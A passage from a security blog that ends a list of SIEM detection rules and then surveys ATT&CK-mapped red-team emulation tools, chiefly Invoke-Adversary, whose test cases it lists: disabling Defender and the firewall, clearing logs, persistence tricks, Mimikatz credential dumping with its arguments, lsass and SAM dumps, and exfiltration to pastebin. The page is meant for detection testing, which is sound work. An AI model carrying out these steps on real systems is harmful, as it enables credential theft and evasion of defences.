  1. The rule alert when it found infected host then “Add To” Current Infected Hosts List and Historical Infected Hosts List (Store at least 1 week)
  2. The rule alert when malware is cleaned from infected Host then “Remove To” Current Infected Hosts List
  3. The rule alert when it found an infected host that is “Historical Infected Hosts List” within the specified time range. THAT SYSTEMs SHOULD SCAN/INVESTIGATE MALWARE AGAIN!!!

8. Multiple Login from different regions

A user account trying to login to multiple resources within a few minutes from/to different region. This is a sign that user’s credentials have been stolen or that a user is up to mischief.


An example of the Correlated rule that Ideal solutions may vary based on your network conditions and security policy.

This rule detects an event in the “Login” normalization category, with an Event Outcome equal “Success” with multiple Source Geo-locations, within a specified Time Range and Events are grouped by Source User.

9. Internal hosts use much SMTP

E-Mail Protocol such as SMTP (Simple Mail Transfer Protocol), POP3 or IMAP4 should be monitoring. Some malware will use these port for send information to Suspicious or Hacker’s server.


Example of Infected client that use SMTP(TCP/25)

10. Internal hosts may query to External/Internal DNS

Many organization has Internal DNS servers for caching records and serve DNS service to internal hosts. DHCP configuration is defined Primary DNS Server to Internal DNS server. If you found that some internal hosts query to External DNS such as, (Google DNS), you should try scan malware on that clients.


Some Incidents found that the internal host query many requests to the internal DNS server (> 1,000 events/hour)

Action and Adaptation

Once the IoA is created, people and processes can act while the rich intelligence is distributed. Directly, alerts and thresholds can guide enforcement actions such as quarantine. In near real time, new findings can factor into policy adjustments, authentication requirements, and human response workflows. Within hours and days, findings can influence risk scores, organizational policies, and end-user education. Over longer timelines—weeks and months—organizations can trend and surface anomalies, predict future attacks and adjust sensitivities.


Original Source & Credit:  Sittikorn Sangrattanapitak, CISSP

Also Read:

  1. Intrusion Prevention System(IPS) and Its Detailed Function – SOC/SIEM
  2. Intrusion Detection System (IDS) and Its detailed Function – SOC/SIEM 

Original Post:

Red Team and Open-Source Mitre’s ATT&CK Framework Test Tools


One way to learn how to better defend your enterprise is to train a red team to simulate attacks. The Mitre ATT&CK framework, which can be a very useful collection of threat tactics and techniques for such a team. The frameworkclassifies and describes a wide range of attacks. To make it even more effective, various commercial and open-source general testing tools have been built to complement its schemas.

Adversarial Tactics, Techniques & Common Knowledge

MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.

Video: Post-Exploit Threat Modeling with ATT&CK




Red Team Automation (RTA)

RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.

RTA is composed of python scripts that generate evidence of over 50 different ATT&CK tactics, as well as a compiled binary application that performs activities such as file timestopping, process injections, and beacon simulation as needed.

Where possible, RTA attempts to perform the actual malicious activity described. In other cases, the RTAs will emulate all or parts of the activity. For example, some lateral movement will by default target local host (though with parameters typically allow for multi-host testing). In other cases, executables such as cmd.exe or python.exe will be renamed to make it appeas as if a Windows binary is doing non-standard activities.




CALDERA is an automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CK™) project. These features allow CALDERA to dynamically operate over a set of systems using variable behavior, which better represents how human adversaries perform operations than systems that follow prescribed sequences of actions.



Atomic Red Team

Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.

Our Atomic Red Team tests are small, highly portable detection tests mapped to the MITRE ATT&CK Framework. Each test is designed to map back to a particular tactic. We hope that this gives defenders a highly actionable way to immediately start testing their defenses against a broad spectrum of attacks.




Metta is an information security preparedness tool.

This project uses Redis/Celery, python, and vagrant with virtualbox to do adversarial simulation. This allows you to test (mostly) your host based instrumentation but may also allow you to test any network based detection and controls depending on how you set up your vagrants.





Invoke-Adversary – Simulating Adversary Operations

Invoke-Adversary is a PowerShell script that helps you to evaluate security products and monitoring solutions based on how well they detect advanced persistent threats. I was inspired to write this script after seeing APTSimulator excellent tool from Florian Roth.


Update 4/14/2018 – In the original script 3rd party tools were downloaded by the script automatically. I believe that the original disclaimers were enough, but decided to change it due to the feedback I got, and now the script ask the users to download the 3rd party tools by themselves – with additional warnings and hash file checking.

This script is provided AS IS without warranty of any kind.

The script should be used for authorized testing and/or educational purposes only with no exceptions. By using the script Windows system’s security and stability (including but not limited to: passwords dump, disabling security features, etc.) may be affected so DON’T RUN IT ON PRODUCTION systems.

The script is my own, based on other researchers’ public domain knowledge and not related to Microsoft in any form.


“Kill Chain”, or What happens during a targeted cybersecurity attack?

Cybersecurity kill chain is a framework developed by Lockheed Martin for identification and prevention of cyber intrusions activity. As attacks may occur in stages, you as defender can put optics and controls to detect or disrupt the entire process.

The stages of the Kill Chain are:

  • Reconnaissance – an attacker is probing for a weakness or bad configuration
  • Weaponization – an attacker is building a payload that can be delivered to the victim (can be a PDF  file or an Office document)
  • Delivery– Sending the payload via e-mail, web link or removable media
  • Exploit– The payload will execute on the victim’s network
  • Installation– The payload will download additional remote access tools and install them to maintain persistence
  • Command and Control– A channel is created between the victim and the attacker
  • Actions– The intended goal is executed (encrypt files, exfiltration of data, etc.)

On top of that model, Mitre, a not-for-profit organization, developed a enhanced model for cyber adversarial behavior, called “Adversarial Tactics, Techniques, and Common Knowledge” (ATT&CK™) Matrix.

Currently, the MITRE ATT&CK™ Matrix provides the most comprehensive framework for adversarial techniques and tactics that enterprises encounter daily.

Technique Description
Persistence Techniques for persistent presence on compromised system
Privilege Escalation Techniques for adversary to obtain a higher level of permissions
Defense Evasion Techniques adversary may use to evade detection or avoid other defenses
Credential Access Techniques resulting in access to or control over system, domain, or service credentials
Discovery Techniques that allow the adversary to gain knowledge about the system and internal network
Lateral Movement Techniques that enable an adversary to access and control remote systems on a network
Execution Techniques that result in execution of adversary-controlled code on a local or remote system
Collection Techniques used to identify and gather information
Exfiltration Techniques that result or aid in the adversary removing files and information from a target network
Command and Control Techniques that represents how adversaries communicate with systems under their control within a target network


Many companies are using Security Information and Event Management (SIEM), Endpoint Protection Platform (EPP) and Endpoint Detection & Response (EDR) products to monitor and protect their environments. What seems to be missing is a tool that can generate a real data that represents real-world targeted attacks.

Invoke-Adversary is a PowerShell script that uses a set of functions to simulate post-compromise adversarial behavior within Windows Enterprise networks.

By using Invoke-Adversary script you can:

  • Assess your security monitoring tools and practices
  • Evaluate Endpoint detection agents


Requirements for deploying:


  • The simplest way to run the script is to open an elevated (run as Administrator) PowerShell ISE window and press F5.

  • The script will start and the first thing you need to do is to read the disclaimer and accept the terms by typing yes


  • Now you can select any test case by choosing its number on the menu

  • Choose which test you want to run by choosing its number on the menu



What are the tactics

Defense Evasion

  • Disable network interface – Disables a network adapter and causes loss of network connectivity
  • Disable Windows Defender AV – Turn off real-time protection, scanning all downloaded files and attachments, behavior monitoring, network protection and privacy mode
  • Add local firewall rule exceptions – Add fictitious rule “Invoke-APT Test Rule” to Windows Advanced Firewall
  • Turn off Windows Firewall – Turn off Windows Advanced Firewall
  • Clear Security Log – clears the security log using wevtutil command

Persistence Tactics

  • Accessibility Features – “Hijack” sethc.exe with cmd.exe using “Image File Execution Options”
  • AppInit DLLs – Adds entry for pserver32.dll under AppInit_DLLs
  • Application Shimming – Create registry value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{842562ef-8d28-411d-a67d-ab75ef611fe8}.sdb
  • Create local user – A new user (user name is: support_388945a0)
  • Create local Administrator – A new user created (user name is: Lost_337fde69_81a9) and added to local Administrators group
  • Create New Service – new service (WindowsHealth) is created
  • Create New Service (Unquoted Path) – same as previous, just with unquoted path
  • Registry Run Keys [HKLM] – New run key under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • Registry Run Keys [HKCU] – New run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled tasks – new scheduled task (OfficeUpdaterA) is created

Credential Access

  1. Mimikatz – Logonpasswords – Download mimikatz to a random file name and execute it with the following arguments “privilege::debug” “sekurlsa::logonpasswords” “exit” (credit:
  2. PowerShell Mimikatz – Run Invoke-Mimikatz.ps1  (credit:
  3. PowerShell Encoded Mimikatz – Run Invoke-Mimikatz.ps1 with encoded PowerShell command line
  4. Capture Lsass Memory Dump – Using Windows Error Reporting to capture lsass memory (credit:
  5. Capture Lsass Memory Dump (Prodump) – Download Prodump to a random file and capture lsass memory
  6. Copy Local SAM File (via Invoke-NinjaCopy) – Run Invoke-NinjaCopy to copy C:\Windows\System32\config\sam file (credit:

Discovery Tactics

  1. Account Discovery – running net commands to discover local and domain users and groups
  2. Network Service Scanning – ports scan (1-1024) on user selected host
  3. System Owner Discovery – whoami command
  4. System Time Discovery – Running “net time” and “w32tm.exe /tz” commands
  5. Service Discovery – List of all services
  6. Network Connections Discovery – netstat

Command and Control

  1. Commonly used Ports – Trying to connect to user selected host
  2. Uncommonly used Ports – Trying to connect to user selected host using uncommon ports  (credit: Florian Roth)
  3. Web Service – Create a new post at pastebin and upload BITS service information
  4. DNS – Well-Known Blacklisted IP Address – Resolving top 10 malicious IP addresses (credit: Florian Roth)
  5. Connect – Well-Known Blacklisted IP Address – Connecting to top 10 malicious IP addresses (credit: Florian Roth)


  1. PSExec (random file name) – Rename PSEec to random file name and execute it (credit:
  2. PSExec (Remote) – Running psexec on user selected host
  3. PowerShell API call – Native API call from PowerShell
  4. Self Delete (batch file) – self deleting batch file
  5. WMI Process Execution – use the WMI command-line (WMIC) utility


  1. Screen Capture – screen capture (credit:

AppLocker ByPasses

  1. Regsvr32 – Regsvr32 technique (credit:

Original Post:

Up ↑